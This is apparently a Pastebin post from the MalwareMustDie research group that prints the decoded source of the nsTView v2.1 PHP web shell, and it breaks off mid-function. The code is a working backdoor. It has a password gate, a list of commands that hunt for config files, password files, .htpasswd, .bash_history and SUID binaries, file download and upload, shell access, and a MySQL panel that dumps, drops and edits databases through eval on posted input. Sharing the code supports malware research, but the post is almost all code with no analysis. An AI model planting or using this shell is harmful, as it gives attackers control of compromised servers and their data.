SHARE
TWEET

And YET another PHP Injected

MalwareMustDie Apr 12th, 2014 474 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // New Case | Evil PHP posted
  2. // Below is the decoded data
  3. // Thank you to MalwareMustDie friends who contributed this evil code
  4.  
  5. <?php
  6. @session_start();
  7. @set_time_limit(0);
  8. @set_magic_quotes_runtime(0);
  9. error_reporting(E_ALL & ~E_NOTICE);
  10. #####cfg#####
  11.  
  12. $create_password = true;
  13. $password = "dezmond";    // default password for nstview, you can change it.
  14.  
  15.  
  16. $fast_commands = "
  17. Show open ports (nst) netstat -an | grep LISTEN | grep tcp
  18. last root (nst) last root
  19. last (all users) (nst) last all
  20. Find all config.php in / (nst) find / -type f -name config.php
  21. Find all config.php in . (nst) find . -type f -name config.php
  22. Find all admin.php in / (nst) find / -type f -name admin.php
  23. Find all admin.php in . (nst) find . -type f -name admin.php
  24. Find all config.inc.php in / (nst) find / -type f -name config.inc.php
  25. Find all config.inc.php in . (nst) find . -type f -name config.inc.php
  26. Find all config.inc in / (nst) find / -type f -name config.inc
  27. Find all config.inc in . (nst) find . -type f -name config.inc
  28. Find all config.dat in / (nst) find / -type f -name config.dat
  29. Find all config.dat in . (nst) find . -type f -name config.dat
  30. Find all config* in / (nst) find / -type f -name config*
  31. Find all config* in . (nst) find . -type f -name config*
  32. Find all pass* in / (nst) find / -type f -name pass*
  33. Find all pass* in . (nst) find . -type f -name pass*
  34. Find all .bash_history in / (nst) find / -type f -name .bash_history
  35. Find all .bash_history in . (nst) find . -type f -name .bash_history
  36. Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
  37. Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
  38. Find all writable dirs/files in / (nst) find / -perm -2 -ls
  39. Find all writable dirs/files in . (nst) find . -perm -2 -ls
  40. Find all suid files in / (nst) find / -type f -perm -04000 -ls
  41. Find all suid files in . (nst) find . -type f -perm -04000 -ls
  42. Find all sgid files in / (nst) find / -type f -perm -02000 -ls
  43. Find all sgid files in . (nst) find . -type f -perm -02000 -ls
  44. Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
  45. Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
  46. OS Version? (nst) sysctl -a | grep version
  47. Kernel version? (nst) cat /proc/version
  48. cat syslog.conf (nst) cat /etc/syslog.conf
  49. Cat - Message of the day (nst) cat /etc/motd
  50. Cat hosts (nst) cat /etc/hosts
  51. Distrib name (nst) cat /etc/issue.net
  52. Distrib name (2) (nst) cat /etc/*-realise
  53. Display all process - wide output (nst) ps auxw
  54. Display all your process (nst) ps ux
  55. Interfaces (nst) ifconfig
  56. CPU? (nst) cat /proc/cpuinfo
  57. RAM (nst) free -m
  58. HDD space (nst) df -h
  59. List of Attributes (nst) lsattr -a
  60. Mount options (nst) cat /etc/fstab
  61. Is cURL installed? (nst) which curl
  62. Is wGET installed? (nst) which wget
  63. Is lynx installed? (nst) which lynx
  64. Is links installed? (nst) which links
  65. Is fetch installed? (nst) which fetch
  66. Is GET installed? (nst) which GET
  67. Is perl installed? (nst) which perl
  68. Where is apache (nst) whereis apache
  69. Where is perl (nst) whereis perl
  70. locate proftpd.conf (nst) locate proftpd.conf
  71. locate httpd.conf (nst) locate httpd.conf
  72. locate my.conf (nst) locate my.conf
  73. locate psybnc.conf (nst) locate psybnc.conf
  74. ";
  75.  
  76.  
  77.  
  78. $fast_commands_win = "
  79. OS Version (nst) ver
  80. Tasklist  (nst) tasklist
  81. Attributes in . (nst) attrib
  82. Show open ports (nst) netstat -an
  83. ";
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90. $ver= "v2.1";
  91.  
  92. $pass=$_POST['pass'];
  93. if($pass==$password){
  94. $_SESSION['nst']="$pass";
  95. }
  96. if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
  97. else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
  98. else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
  99. else $ip = $_SERVER['REMOTE_ADDR'];
  100. $ip=htmlspecialchars($ip);
  101.  
  102. if($create_password==true){
  103.  
  104. if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
  105. die("
  106. <title>nsTView $ver:: nst.void.ru</title>
  107. <center>
  108. <table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
  109. <font size=1 face=verdana><center>
  110. <b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
  111. </center>
  112. <form method=post>
  113. Password:<br>
  114. <input type=password name=pass size=30 tabindex=1>
  115. </form>
  116. <b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
  117. <b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
  118. <b>Your ip:</b> ".$ip."
  119. </td></tr></table>
  120. ");}
  121.  
  122. }
  123. $d=$_GET['d'];
  124.  
  125. function adds($editf){
  126. #if(get_magic_quotes_gpc()==0){
  127. $editf=addslashes($editf);
  128. #}
  129. return $editf;
  130. }
  131. function adds2($editf){
  132. if(get_magic_quotes_gpc()==0){
  133. $editf=addslashes($editf);
  134. }
  135. return $editf;
  136. }
  137.  
  138. $f   = "nst_sql.txt";
  139. $f_d = $_GET['f_d'];
  140.  
  141. if($_GET['download']){
  142. $download=$_GET['download'];
  143. header("Content-disposition: attachment; filename=\"$download\";");
  144. readfile("$d/$download");
  145. exit;}
  146.  
  147. if($_GET['dump_download']){
  148. header("Content-disposition: attachment; filename=\"$f\";");
  149. header("Content-length: ".filesize($f_d."/".$f));
  150. header("Expires: 0");
  151. readfile($f_d."/".$f);
  152. if(is_writable($f_d."/".$f)){
  153. unlink($f_d."/".$f);
  154. }
  155. die;
  156. }
  157.  
  158.  
  159. $images=array(".gif",".jpg",".png",".bmp",".jpeg");
  160. $whereme=getcwd();
  161. @$d=@$_GET['d'];
  162. $copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
  163. $php_self=@$_SERVER['PHP_SELF'];
  164. if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
  165. if(!isset($d)){$d=$whereme;}
  166. $d=str_replace("\\","/",$d);
  167. if(@$_GET['p']=="info"){
  168. @phpinfo();
  169. exit;}
  170. if(@$_GET['img']=="1"){
  171. @$e=$_GET['e'];
  172. header("Content-type: image/gif");
  173. readfile("$d/$e");
  174. }
  175. if(@$_GET['getdb']=="1"){
  176. header('Content-type: application/plain-text');
  177. header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
  178. }
  179. print "<title>nsT View $ver</title>
  180. <style>
  181. BODY, TD, TR {
  182. text-decoration: none;
  183. font-family: Verdana;
  184. font-size: 8pt;
  185. SCROLLBAR-FACE-COLOR: #363d4e;
  186. SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
  187. SCROLLBAR-SHADOW-COLOR: #363d4e;
  188. SCROLLBAR-ARROW-COLOR: #363d4e;
  189. SCROLLBAR-TRACK-COLOR: #91AAFF
  190. }
  191. input, textarea, select {
  192. font-family: Verdana;
  193. font-size: 10px;
  194. color: black;
  195. background-color: white;
  196. border: solid 1px;
  197. border-color: black
  198. }
  199. UNKNOWN {
  200. COLOR: #0006DE;
  201. TEXT-DECORATION: none
  202. }
  203. A:link {
  204. COLOR: #0006DE;
  205. TEXT-DECORATION: none
  206. }
  207. A:hover {
  208. COLOR: #FF0C0B;
  209. TEXT-DECORATION: none
  210. }
  211. A:active {
  212. COLOR: #0006DE;
  213. TEXT-DECORATION: none
  214. }
  215. A:visited {
  216. TEXT-DECORATION: none
  217. }
  218. </style>
  219. <script>
  220. function ShowOrHide(d1, d2) {
  221. if (d1 != '') DoDiv(d1);
  222. if (d2 != '') DoDiv(d2);}
  223.  
  224. function DoDiv(id) {
  225. var item = null;
  226. if (document.getElementById) {
  227. item = document.getElementById(id);
  228. } else if (document.all){
  229. item = document.all[id];
  230. } else if (document.layers){
  231. item = document.layers[id];}
  232. if (!item) {}
  233. else if (item.style) {
  234. if (item.style.display == \"none\"){ item.style.display = \"\"; }
  235. else {item.style.display = \"none\"; }
  236. }else{ item.visibility = \"show\"; }}
  237.  
  238. function cwd(text){
  239. document.sh311Form.sh3.value+=\" \"+ text;
  240. document.sh311Form.sh3.focus();
  241. }
  242.  
  243.  
  244. </script>
  245. ";
  246. print "<body vlink=#0006DE>
  247. <table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
  248. <tr><td><font face=wingdings size=2>0</font>";
  249. $expl=explode("/",$d);
  250. $coun=count($expl);
  251. if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
  252. else{
  253.         echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
  254. for($i=1; $i<$coun; $i++){
  255.         @$xx.=$expl[$i]."/";
  256. $sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
  257. $sls=str_replace("//","/",$sls);
  258. $sls=str_replace("/'></a>/","/'></a>",$sls);
  259. print $sls;
  260. }
  261. if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
  262. if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
  263. echo "</td></tr>";
  264. if($os=="unix"){ echo "
  265. <tr><td><b>id:</b> ".@exec('id')."</td></tr>
  266. <tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
  267. <tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
  268. [<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
  269. [<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
  270. [<a href='$php_self'>Home</a>]
  271. [<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
  272. [<a href='$php_self?d=$d&t=upload'>Upload</a>]
  273. [<a href='$php_self?t=tools'>Tools</a>]
  274. [<a href='$php_self?p=info'>PHPinfo</a>]
  275. [<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
  276. [<a href='$php_self?p=sql'>SQL</a>]
  277. [<a href='$php_self?p=selfremover'>Self Remover</a>]
  278. </td></tr>
  279. ";
  280. if($os=="win"){ echo "
  281. <tr><td bgcolor=white>
  282. <center><font face=wingdings size=2><</font>
  283. <a href='$php_self?d=a:/'>A</a>
  284. <a href='$php_self?d=b:/'>B</a>
  285. <a href='$php_self?d=c:/'>C</a>
  286. <a href='$php_self?d=d:/'>D</a>
  287. <a href='$php_self?d=e:/'>E</a>
  288. <a href='$php_self?d=f:/'>F</a>
  289. <a href='$php_self?d=g:/'>G</a>
  290. <a href='$php_self?d=h:/'>H</a>
  291. <a href='$php_self?d=i:/'>I</a>
  292. <a href='$php_self?d=j:/'>J</a>
  293. <a href='$php_self?d=k:/'>K</a>
  294. <a href='$php_self?d=l:/'>L</a>
  295. <a href='$php_self?d=m:/'>M</a>
  296. <a href='$php_self?d=n:/'>N</a>
  297. <a href='$php_self?d=o:/'>O</a>
  298. <a href='$php_self?d=p:/'>P</a>
  299. <a href='$php_self?d=q:/'>Q</a>
  300. <a href='$php_self?d=r:/'>R</a>
  301. <a href='$php_self?d=s:/'>S</a>
  302. <a href='$php_self?d=t:/'>T</a>
  303. <a href='$php_self?d=u:/'>U</a>
  304. <a href='$php_self?d=v:/'>V</a>
  305. <a href='$php_self?d=w:/'>W</a>
  306. <a href='$php_self?d=x:/'>X</a>
  307. <a href='$php_self?d=y:/'>Y</a>
  308. <a href='$php_self?d=z:/'>Z</a>
  309. </td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
  310. print "<tr><td>
  311. :: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
  312. <a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
  313. <a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
  314. if($os=="unix"){
  315. print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
  316. }
  317. print "</td></tr>";
  318.  
  319.  
  320.  
  321.  
  322.  
  323. if($_GET['p']=="ftp"){
  324. print "<tr><td>";
  325.  
  326.  
  327.  
  328. print "</td></tr></table>";
  329. print $copyr;
  330. exit;
  331. }
  332.  
  333.  
  334.  
  335.  
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342. if(@$_GET['p']=="sql"){
  343. print "<tr><td>";
  344. ###
  345.  
  346. $f_d = $_GET['f_d'];
  347. if(!isset($f_d)){$f_d=".";}
  348. if($f_d==""){$f_d=".";}
  349.  
  350. $php_self=$_SERVER['PHP_SELF'];
  351. $delete_table=$_GET['delete_table'];
  352. $tbl=$_GET['tbl'];
  353. $from=$_GET['from'];
  354. $to=$_GET['to'];
  355. $adress=$_POST['adress'];
  356. $port=$_POST['port'];
  357. $login=$_POST['login'];
  358. $pass=$_POST['pass'];
  359. $adress=$_GET['adress'];
  360. $port=$_GET['port'];
  361. $login=$_GET['login'];
  362. $pass=$_GET['pass'];
  363. $conn=$_GET['conn'];
  364. if(!isset($adress)){$adress="localhost";}
  365. if(!isset($login)){$login="root";}
  366. if(!isset($pass)){$pass="";}
  367. if(!isset($port)){$port="3306";}
  368. if(!isset($from)){$from=0;}
  369. if(!isset($to)){$to=50;}
  370.  
  371.  
  372. ?>
  373. <style>
  374. table,td{
  375. color: black;
  376. font-face: verdana;
  377. font-size: 11px;
  378.  
  379. }
  380. </style>
  381. <font color=black face=verdana size=1>
  382. <?php if(!$conn){ ?>
  383.  
  384. <!-- table 1 -->
  385. <table bgcolor=#D7FFA8>
  386. <tr><td valign=top>Address:</td><td><form><input name=adress value='<?php echo $adress; ?>' size=20><input name=port value='<?php echo $port; ?>' size=6></td></tr>
  387. <tr><Td valign=top>Login: </td><td><input name=login value='<?php echo $login; ?>' size=10></td></tr>
  388. <tr><Td valign=top>Pass:</td><td> <input name=pass value='<?php echo $pass; ?>' size=10><input type=hidden name=p value=sql></td></tr>
  389. <tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?php } ?>
  390. <tr><td valign=top><?php if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
  391. </table>
  392. <!-- end of table 1 -->
  393.  
  394.  
  395. <?php
  396. $conn=$_GET['conn'];
  397. $adress=$_GET['adress'];
  398. $port=$_GET['port'];
  399. $login=$_GET['login'];
  400. $pass=$_GET['pass'];
  401. if($conn){
  402.  
  403. $serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
  404. if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
  405. print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
  406. print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
  407. print "<br><font color=red>[db]</font><Br>";
  408. print "<font color=white>";
  409. $res = mysql_list_dbs($serv);
  410. while ($str=mysql_fetch_row($res)){
  411. print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
  412. $tc++;
  413. }
  414. $baza=$_GET['baza'];
  415. $db=$_GET['db'];
  416. print "<font color=red>[Total db: $tc]</font><br>";
  417. if($baza){
  418. print "<div align=left><font color=green>db: [$db]</div></font><br>";
  419. $result=@mysql_list_tables($db);
  420. while($str=@mysql_fetch_array($result)){
  421. $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
  422. $records=mysql_fetch_array($c);
  423.  
  424. if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
  425. if($records[0]=="0"){
  426. print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
  427. }else{
  428. print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
  429. }
  430. mysql_free_result($c);
  431. $total_t++;
  432. }
  433. print "<br><B><font color=red>Total tables: $total_t</font></b>";
  434.                                 print "<pre>";
  435. for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
  436.                                 print "</pre>";
  437. }
  438.  
  439.  
  440.  
  441.  
  442. if(isset($delete_table)){
  443. mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
  444. mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
  445. print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
  446. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
  447. }
  448.  
  449. if(isset($_GET['delete_db'])){
  450. mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
  451. print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
  452. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
  453. }
  454.  
  455.  
  456.  
  457. if(isset($_POST['delete_row'])){
  458. $_POST['delete_row'] = base64_decode($_POST['delete_row']);
  459. mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
  460. $del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
  461. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
  462. }
  463.  
  464.  
  465.  
  466. $vn=$_GET['vn'];
  467. print "</td><td valign=top>";
  468. print "<font color=green>Database: $db => $vn</font>";
  469.  
  470.  
  471. if(isset($_POST['edit_row'])){
  472. $edit_row=base64_decode($_POST['edit_row']);
  473.  
  474. $r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
  475. print "<br><br>
  476.       <table border=0 cellpadding=1 cellspacing=1><tr>
  477.       <td><b>Row</b></td><td><b>Value</b></td></tr>";
  478. print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
  479. print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
  480. print " <input type=radio name=upd value=update checked>Update<br>
  481.        <input type=radio name=upd value=insert>Insert new<br><br>";
  482.  
  483.  
  484. $i=0;
  485. while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
  486. foreach($mn as $key =>$val){
  487. $type  = mysql_field_type($r_edit, $i);
  488. $len  = mysql_field_len($r_edit, $i);
  489. $del .= "`$key`='".adds($val)."' AND ";
  490. $c=strlen($val);
  491. $val=htmlspecialchars($val, ENT_NOQUOTES);
  492. $str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
  493. $buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
  494. $i++;
  495. }
  496.  
  497. }
  498. $delstring=base64_encode($del);
  499. print "<input type=hidden name=delstring value=\"$delstring\">";
  500. print "$buff</table><br>";
  501. print "<br>";
  502. if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
  503.  
  504.  
  505.  
  506.  
  507. if($_POST['makeupdate']){
  508. if($_POST['upd']=='update'){
  509. preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
  510. $delstring=$_POST['delstring'];
  511. $delstring=base64_decode($delstring);
  512. $delstring = substr($delstring, 0, strlen($delstring)-5);
  513.  
  514. for($i=0; $i<count($matches3[0]); $i++){
  515. eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
  516. $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
  517. }
  518. $total_str = substr_replace($total_str,"",-1);
  519. $up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
  520. $up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
  521. print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
  522. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
  523. mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
  524. }
  525.  
  526.  
  527.  
  528. if($_POST['upd']=='insert'){
  529. preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
  530. $delstring=$_POST['delstring'];
  531. $delstring=base64_decode($delstring);
  532. $delstring = substr($delstring, 0, strlen($delstring)-5);
  533.  
  534. for($i=0; $i<count($matches3[0]); $i++){
  535. eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
  536. $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
  537. }
  538.  
  539. $total_str = ",,".$total_str;
  540.  
  541. preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
  542.  
  543. for($i=0; $i<count($matches4[1]); $i++){
  544.         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
  545.         $total_m_i .= "`".$matches4[1][$i]."`,";
  546.         $total_m_x .= "'".$matches4[2][$i]."',";
  547. }
  548. $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
  549. $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
  550.  
  551. $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
  552. mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
  553. print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
  554. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
  555. }
  556. }
  557. }
  558.  
  559. if($_GET['ins_new_line']){
  560. $qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
  561. print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
  562. Insert new line in <b>$tbl</b> table</b><Br><br>";
  563. print "<table>";
  564. while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
  565. foreach ($new_line as $key =>$next) {
  566. $buff .= "$next ";
  567. }
  568. $expl=explode(" ",$buff);
  569. $buff2 .= $expl[0]." ";
  570. print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
  571. <td><textarea name='$expl[0]' cols=39 rows=5></textarea>
  572. </td></tr>";
  573. unset($buff);
  574. }
  575. print "</table>
  576. <center><input type=submit value=Insert name=mk_ins></form></center>";
  577. if($_POST['mk_ins']){
  578. preg_match_all("/(.*?)\s/i",$buff2,$matches3);
  579. for($i=0; $i<count($matches3[0]); $i++){
  580. eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
  581. $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
  582. }
  583.  
  584. $total_str = ",,".$total_str;
  585. preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
  586.  
  587. for($i=0; $i<count($matches4[1]); $i++){
  588.         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
  589.         $total_m_i .= "`".$matches4[1][$i]."`,";
  590.         $total_m_x .= "'".$matches4[2][$i]."',";
  591. }
  592. $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
  593. $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
  594.  
  595. $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
  596. mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
  597. print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
  598. print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
  599. }
  600. }
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607. if(isset($_GET['rename_table'])){
  608. $rename_table=$_GET['rename_table'];
  609. print "<br><br>Rename <b>$rename_table</b> to<br><br>
  610. <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
  611. <input name=new_name size=30><center><br>
  612. <input type=submit value=Rename></center>
  613. </form>
  614. ";
  615.  
  616. if(isset($_POST['new_name'])){
  617. mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
  618. mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
  619. print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
  620. print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
  621. }
  622.  
  623. }
  624.  
  625.  
  626.  
  627. if($_GET['dump']){
  628. if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
  629. <font color=green><b>You can change temp folder for dump file in your browser!<br>
  630. <font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
  631. Then press enter</b></font>
  632. </font>");}
  633. mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
  634. $fp = fopen($f_d."/".$f,"w");
  635. fwrite($fp, "# nsTView.php v$ver
  636.  
  637.  
  638. ");
  639. $que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
  640. $row = mysql_fetch_row($que);
  641. fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
  642. $row[1]=str_replace("\n","\r\n",$row[1]);
  643. fwrite($fp, $row[1].";\r\n\r\n");
  644. $que = mysql_query("SELECT * FROM `$tbl`");
  645. if(mysql_num_rows($que)>0){
  646. while($row = mysql_fetch_assoc($que)){
  647. $keys = join("`, `", array_keys($row));
  648. $values = array_values($row);
  649. foreach($values as $k=>$v) {$values[$k] = adds2($v);}
  650. $values = implode("', '", $values);
  651. $sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
  652. fwrite($fp, $sql);
  653. }
  654. }
  655. fclose($fp);
  656. print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
  657. }
  658.  
  659.  
  660.  
  661.  
  662.  
  663. if($_GET['dump_db']){
  664. $c=mysql_num_rows(mysql_list_tables($db));
  665. if($c>=1){
  666. print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
  667. }else{
  668. print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
  669. die;
  670. }
  671. if(sizeof($tabs)==0){
  672. $res = mysql_query("SHOW TABLES FROM $db");
  673. if(mysql_num_rows($res)>0){
  674. while($row=mysql_fetch_row($res)){
  675. $tabs[] .= $row[0];
  676. }
  677. }
  678. }
  679. $fp = fopen($f_d."/".$f,"w");
  680. fwrite($fp, "# nsTView.php v$ver
  681.  
  682.  
  683. ");
  684. foreach($tabs as $tab) {
  685. fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
  686. $res = mysql_query("SHOW CREATE TABLE `$tab`");
  687. $row = mysql_fetch_row($res);
  688. $row[1]=str_replace("\n","\r\n",$row[1]);
